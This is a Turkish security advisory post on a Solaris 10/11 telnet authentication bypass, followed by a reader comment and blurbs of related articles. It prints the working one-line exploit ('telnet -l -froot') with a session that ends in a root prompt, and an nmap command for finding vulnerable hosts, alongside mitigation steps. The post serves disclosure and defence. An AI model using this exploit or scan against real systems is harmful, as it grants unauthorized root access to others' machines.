Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

URL Parametrelerini doğru kullanmayınca başa gelenler

tongucyumruk

Hep ciddi ciddi şeyler yazacak değiliz, biraz da eğlenelim. Bazen (düzeltme: çoğu zaman) en büyük şirketler dahi web üzerinde birşeyler yaparken en basit güvenlik önlemlerini unutabiliyorlar. İşte bu sefer madara olan şirketimiz de sürekli olarak geliştiricilerin ahını almaktan çekinmeyen Oracle. Bu linke tıklayarak kendilerinin URL parametrelerini hiçbir doğrulamadan geçirmeden doğrudan...

ISCTurkey Uluslararası Bilgi Güvenliği ve Kriptoloji Konferansı

anonim

"GELECEĞİNİ KORU"

Telekomünikasyon Kurumu, Gazi Üniversitesi ve Orta Doğu Teknik Üniversitesi tarafından düzenlenen ISCTURKEY (Information Security and Cryptology Conference) bu yıl "Geleceğini koru!" sloganı ve "Mobil / Elektronik İmza" ana temasıyla 13-14 Aralık tarihlerinde Ankara Sheraton Hotel & Convention Center'da.

Greasemonkey Güvenlik Açığı

butch

Oldukça ilgi gören Firefox eklentilerinden biri olan Greasemonkey'in geliştiricileri tarafından yapılan açıklamaya göre, eklentide kullanıcıların bilgisayarlarında bulunan verilere erişim sağlayan önemli bir güvenlik açığı bulunuyor. Greasemonkey kullanıcılarının eklentiyi kaldırmaları şiddetle öneriliyor. Detaylar için eweek.com ve mozdev.org.

Tehdit ve Cesaret

FZ

Mine G. Kırıkkanat'ın 27 Ekim 2001 tarihli (Cumartesi) yazısından alıntıdır (yorumsuz):

... Suç duyurusunda bulunduğumuz ölüm tehditlerinden biri, İBDA-C imzalıydı ve İhlas Holding kuruluşu ihlas.net.tr'nin bir abonesinden geldiği tespit edildi. Adam bulundu, sorgulandı ve önce DGM, halen İstanbul 11. Asliye Ceza Mahkemesi'nde yargılanıyor. Ancak başından beri suçu reddediyor ve kişisel Internet şifresini ihlas.net.tr'den edinen başka birisinin onun adresiyle tehdit göndermiş olması ihtimali var.

Echelon'a karşı kuantum kriptografi

e2e

Computer World'daki habere göre Avrupa Birliği, önümüzdeki 4 yıl boyunca Kuantum Kriptografi altyasıyla güvenli veri iletişimi alanında yapılacak geliştirme çalışmalarına 13 milyon Euro ayırmayı planlıyor.

Eğer proje başarılı olursa "kırılamaz kod" gerçekleştirilmiş olacak. Böylece ABD, İngiltere, Kanada, Yeni Zelanda ve Avustralya gizli servislerine bilgi taşıyan Echelon'un devre dışı bırakılması hedefleniyor.